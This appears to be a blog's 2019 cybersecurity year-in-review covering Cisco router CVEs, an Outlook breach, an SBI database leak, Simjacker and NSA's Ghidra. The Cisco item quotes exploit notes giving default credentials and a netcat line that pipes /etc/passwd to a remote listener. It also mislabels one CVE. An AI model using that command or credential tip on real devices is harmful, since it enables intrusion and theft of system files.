2019, a year is near to end. We have reported related Cyber Security news and Tutorials.
As per our research, 2019 year goes to the highest Data breaches ever. There are more than 4 billion data breach records that have been reported.
1. Cisco Routers Hacked By Using New Exploit
- CVE-2019-1653 – To allows a remote attacker to get sensitive device configuration details without a password.
- CVE-2019-1653 – To allows a remote attack to inject and run admin commands on the device without a password.
The vulnerabilities allow for the following:
- Dumping (Plaintext) Configuration File! (includes hashes for the webUI!)
- Dumping (Encrypted) Diagnostic/Debug Files! (including config, and the /etc and /var directories)
- Decrypting the encrypted Diagnostic/Debug Files! (yes, you get /etc/shadow!)
- Post-Authentication Remote Command Injection as root in the webUI!
Post-Auth RCE Exploit
CVE-2019-1652 outlines a trivial shell command injection vulnerability, which requires authentication. exec_cmd.py implements this, assuming you have valid login creds. “cisco:cisco” is the default, but you could also crack some hashes.
The command injection is blind, so you won’t get any output. The environment is an incredibly limited Busybox setup with a crippled netcat, and the boxes are mips64, so I didn’t bother writing a reverse-shell exploit this time. You can, however, get command output by doing stuff like cat /etc/passwd | nc HOST PORT and having a listener running, or whatever.
Full story read here
2. Outlook Accounts Hacked – Microsoft had Confirmed
Hackers compromised Microsoft’s customer support account and access information of some outlook email accounts.
- Hackers have accessed
- Email address,
- Folder names
- E-mail subject lines
- But didn’t get access to email attachments.
“Our data indicates that account-related information (but not the content of any e-mails) could have been viewed, but Microsoft has no indication why that information was viewed or how it may have been used,” the Microsoft said in the email.
“We have identified that a Microsoft support agents credentials were compromised, enabling individuals outside Microsoft to access information within your Microsoft email account.”
“Microsoft is committed to providing our customers with transparency. As part of maintaining this trust and commitment to you, we are informing you of a recent event that affected your Microsoft-managed email account.”
“Microsoft regrets any inconvenience caused by this issue,” the company says. “Please be assured that Microsoft takes data protection very seriously and has engaged its internal security and privacy teams in the investigation and resolution of the issue, as well as. additional hardening of systems and processes to prevent such recurrence.”
Full Story read here
3. State Bank Of India SBI Hacked – Customers Account Data Breached
- SBI Server Database was not protected by Password.
- Unprotected Server leaked Million of Customers Accounts Details
- Security researchers was able to track customers transaction details.
What happened with SBI?
The server stored data related to SBI Quick service. The server contained details of all messages sent to those SBI customers who subscribed for the service.
SBI Quick is a new method of digital banking that allows its customers to learn about their bank accounts and other financial details through SMS. Customers need to send commands or missed calls to the service for getting the required information. It is beneficial for those who don’t have smartphones or access to Internet banking.
SBI claims more than 500 million customers across the globe with 740 million accounts.
Finally the database has reportedly fixed by Bank. Full story read here.
4. SIMJACKER Vulnerability- To Take Over Mobile Phones And Exploit Sim Cards
Wireless Internet Browser (WIB) SIM Kit Also Leads To SimJacker Attacks
Vulnerabilities in WIB Simcard-browsers can let attackers globally control the victim mobile phone, make a phone, Send SMS and send victim’s location.
According to Ginno Security Lab, the Wireless Internet Browser (WIB) is specified by SmartTrust and is oe of the market leading solution for SIM toolkit based browsing. The affection of the vulnerabilities at WIB spreads worldwide and causes serious harm to millions of telecom subscribers.
By sending a malicious SMS to victim phone number, attacker can abuse the vulnerabilities in the WIB sim browser to remotely take control of the victim mobile phone to perform harmful actions such as: send sms, make phone call, get victim’s location, launch other browsers (e.g WAP browser), get victim’s IMEI, etc.
The affection of the vulnerability in WIB spreads worldwide and puts hundreds of millions of telecom subscribers worldwide at risk. The security vulnerability comes from sim card, depends neither on mobile phone devices nor on mobile phone Operating System, so every mobile phone was affected.
The SIMJACKER vulnerability found by AdaptiveMobile security researchers. The vulnerability is currently being actively exploited by a specific private company that works with governments to monitor individuals.
The Simjacker vulnerability could extend to over 1 billion mobile phone users globally, potentially impacting countries in the Americas, West Africa, Europe, Middle East and indeed any region of the world where this SIM card technology is in use.
The researchers said they had observed real-attacks against users with devices from nearly every manufacturer, including Apple, ZTE, Motorola, Samsung, Google, Huawei, and even IoT devices with SIM cards.
Full story read here
5. GHIDRA- Free Reverse Engineering Tool By NSA
The National Security Agency (NSA) released GHIDRA a Free Reverse Engineering Tool
Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured, high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows, Mac OS, and Linux.
“If you’ve done software reverse engineering what you’ve found out is it’s both art and science, there’s not a hard path from the beginning to the end,” NSA cybersecurity advisor Rob Joyce said.
“Ghidra is a software reverse engineering tool built for our internal use at NSA. We’re not claiming that this is the one that’s going to be replacing everything out there—it’s not. But it helped us address some things in our work flow.”
As per our research, 2018 year was dedicated to Ransomware, 2019 goes to Data Breaches.
Our prediction for 2020 is might be hackers attack on Mobile Apps in category e-commerce and payment gateways. The companies should hire Cyber Security researchers or launch Bug Bounty programs to increase their network security.
Now, What is your Cyber Security prediction for 2020?